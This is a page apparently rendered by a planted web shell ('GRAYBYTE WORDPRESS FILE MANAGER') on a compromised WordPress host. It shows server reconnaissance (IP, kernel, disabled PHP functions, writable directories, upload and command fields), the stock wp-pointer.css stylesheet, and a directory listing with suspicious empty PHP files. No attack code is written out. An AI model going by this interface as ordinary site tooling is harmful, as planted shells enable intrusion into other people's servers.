GRAYBYTE WORDPRESS FILE MANAGER8654

Server IP : 149.255.58.128 / Your IP : 216.73.216.208
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/public_html/wp-includes/css/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/public_html/wp-includes/css//wp-pointer.css
.wp-pointer-content {
	padding: 0 0 10px;
	position: relative;
	font-size: 13px;
	background: #fff;
	border: 1px solid #c3c4c7;
	box-shadow: 0 3px 6px rgba(0, 0, 0, 0.08);
}

.wp-pointer-content h3 {
	position: relative;
	margin: -1px -1px 5px;
	padding: 15px 18px 14px 60px;
	border: 1px solid #2271b1;
	border-bottom: none;
	line-height: 1.4;
	font-size: 14px;
	color: #fff;
	background: #2271b1;
}

.wp-pointer-content h3:before {
	background: #fff;
	border-radius: 50%;
	color: #2271b1;
	content: "\f227";
	font: normal 20px/1.6 dashicons;
	position: absolute;
	top: 8px;
	left: 15px;
	speak: never;
	text-align: center;
	width: 32px;
	height: 32px;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.wp-pointer-content h4 {
	margin: 1.33em 20px 1em;
	font-size: 1.15em;
}

.wp-pointer-content p {
	padding: 0 20px;
}

.wp-pointer-buttons {
	margin: 0;
	padding: 5px 15px;
	overflow: auto;
}

.wp-pointer-buttons a {
	float: right;
	display: inline-block;
	text-decoration: none;
}

.wp-pointer-buttons a.close {
	padding-left: 3px;
	position: relative;
}

.wp-pointer-buttons a.close:before {
	background: none;
	color: #787c82;
	content: "\f153";
	display: block !important;
	font: normal 16px/1 dashicons;
	speak: never;
	margin: 1px 0;
	text-align: center;
	-webkit-font-smoothing: antialiased !important;
	width: 10px;
	height: 100%;
	position: absolute;
	left: -15px;
	top: 1px;
}

.wp-pointer-buttons a.close:hover:before {
	color: #d63638;
}

/* The arrow base class must take up no space, even with transparent borders. */
.wp-pointer-arrow,
.wp-pointer-arrow-inner {
	position: absolute;
	width: 0;
	height: 0;
}

.wp-pointer-arrow {
	z-index: 10;
	width: 0;
	height: 0;
	border: 0 solid transparent;
}

.wp-pointer-arrow-inner {
	z-index: 20;
}

/* Make Room for the Arrow! */
.wp-pointer-top,
.wp-pointer-undefined {
	padding-top: 13px;
}

.wp-pointer-bottom {
	margin-top: -13px;
	padding-bottom: 13px;
}

/* rtl:ignore */
.wp-pointer-left {
	padding-left: 13px;
}
/* rtl:ignore */
.wp-pointer-right {
	margin-left: -13px;
	padding-right: 13px;
}

/* Base Size & Positioning */
.wp-pointer-top .wp-pointer-arrow,
.wp-pointer-bottom .wp-pointer-arrow,
.wp-pointer-undefined .wp-pointer-arrow {
	left: 50px;
}

.wp-pointer-left .wp-pointer-arrow,
.wp-pointer-right .wp-pointer-arrow {
	top: 50%;
	margin-top: -15px;
}

/* Arrow Sprite */
.wp-pointer-top .wp-pointer-arrow,
.wp-pointer-undefined .wp-pointer-arrow {
	top: 0;
	border-width: 0 13px 13px;
	border-bottom-color: #2271b1;
}

.wp-pointer-top .wp-pointer-arrow-inner,
.wp-pointer-undefined .wp-pointer-arrow-inner {
	top: 1px;
	margin-left: -13px;
	margin-top: -13px;
	border: 13px solid transparent;
	border-bottom-color: #2271b1;
	display: block;
	content: " ";
}

.wp-pointer-bottom .wp-pointer-arrow {
	bottom: 0;
	border-width: 13px 13px 0;
	border-top-color: #c3c4c7;
}

.wp-pointer-bottom .wp-pointer-arrow-inner {
	bottom: 1px;
	margin-left: -13px;
	margin-bottom: -13px;
	border: 13px solid transparent;
	border-top-color: #fff;
	display: block;
	content: " ";
}

/* rtl:ignore */
.wp-pointer-left .wp-pointer-arrow {
	left: 0;
	border-width: 13px 13px 13px 0;
	border-right-color: #c3c4c7;
}

/* rtl:ignore */
.wp-pointer-left .wp-pointer-arrow-inner {
	left: 1px;
	margin-left: -13px;
	margin-top: -13px;
	border: 13px solid transparent;
	border-right-color: #fff;
	display: block;
	content: " ";
}

/* rtl:ignore */
.wp-pointer-right .wp-pointer-arrow {
	right: 0;
	border-width: 13px 0 13px 13px;
	border-left-color: #c3c4c7;
}

/* rtl:ignore */
.wp-pointer-right .wp-pointer-arrow-inner {
	right: 1px;
	margin-right: -13px;
	margin-top: -13px;
	border: 13px solid transparent;
	border-left-color: #fff;
	display: block;
	content: " ";
}

.wp-pointer.arrow-bottom .wp-pointer-content {
	margin-bottom: -45px;
}

.wp-pointer.arrow-bottom .wp-pointer-arrow {
	top: 100%;
	margin-top: -30px;
}

/* Disable pointers at responsive sizes */
@media screen and (max-width: 782px) {
	.wp-pointer {
		display: none;
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 20 2025 03:29:06
1032 / wheelch2
0755
dist
--
March 05 2024 12:06:43
1032 / wheelch2
0755
about.php
0 KB
December 16 2023 06:00:20
1032 / wheelch2
0644
admin-bar-rtl.css
24.157 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
admin-bar-rtl.min.css
19.842 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
admin-bar.css
24.124 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
admin-bar.min.css
19.843 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
buttons-rtl.css
9.489 KB
September 21 2023 01:33:20
1032 / wheelch2
0644
buttons-rtl.min.css
5.788 KB
September 21 2023 01:33:20
1032 / wheelch2
0644
buttons.css
9.453 KB
September 21 2023 01:33:20
1032 / wheelch2
0644
buttons.min.css
5.786 KB
September 21 2023 01:33:20
1032 / wheelch2
0644
classic-themes.css
0.712 KB
February 14 2023 02:20:20
1032 / wheelch2
0644
classic-themes.min.css
0.284 KB
February 14 2023 02:20:20
1032 / wheelch2
0644
customize-preview-rtl.css
3.583 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
customize-preview-rtl.min.css
2.808 KB
March 04 2021 02:46:22
1032 / wheelch2
0644
customize-preview.css
3.544 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
customize-preview.min.css
2.803 KB
March 04 2021 02:46:22
1032 / wheelch2
0644
dashicons.css
60.899 KB
October 21 2020 17:46:08
1032 / wheelch2
0644
dashicons.min.css
57.633 KB
March 04 2021 02:46:22
1032 / wheelch2
0644
dropdown.php
0 KB
March 02 2024 06:00:09
1032 / wheelch2
0644
editor-rtl.css
31.96 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
editor-rtl.min.css
26.342 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
editor.css
31.923 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
editor.min.css
26.339 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
input.php
0 KB
December 16 2023 06:00:19
1032 / wheelch2
0644
jquery-ui-dialog-rtl.css
5.827 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
jquery-ui-dialog-rtl.min.css
4.445 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
jquery-ui-dialog.css
5.789 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
jquery-ui-dialog.min.css
4.441 KB
January 27 2021 00:25:00
1032 / wheelch2
0644
media-views-rtl.css
56.071 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
media-views-rtl.min.css
45.33 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
media-views.css
56.028 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
media-views.min.css
45.321 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
wp-auth-check-rtl.css
2.485 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
wp-auth-check-rtl.min.css
1.873 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
wp-auth-check.css
2.449 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
wp-auth-check.min.css
1.871 KB
October 17 2023 02:18:24
1032 / wheelch2
0644
wp-embed-template-ie.css
1.442 KB
October 31 2015 10:08:26
1032 / wheelch2
0644
wp-embed-template-ie.min.css
1.438 KB
August 20 2017 00:40:48
1032 / wheelch2
0644
wp-embed-template.css
7.749 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
wp-embed-template.min.css
6.802 KB
October 17 2023 17:50:24
1032 / wheelch2
0644
wp-login.php
0 KB
March 02 2024 06:00:09
1032 / wheelch2
0644
wp-pointer-rtl.css
3.971 KB
September 03 2021 02:48:00
1032 / wheelch2
0644
wp-pointer-rtl.min.css
3.167 KB
September 03 2021 02:48:00
1032 / wheelch2
0644
wp-pointer.css
3.932 KB
September 03 2021 02:48:00
1032 / wheelch2
0644
wp-pointer.min.css
3.162 KB
September 03 2021 02:48:00
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF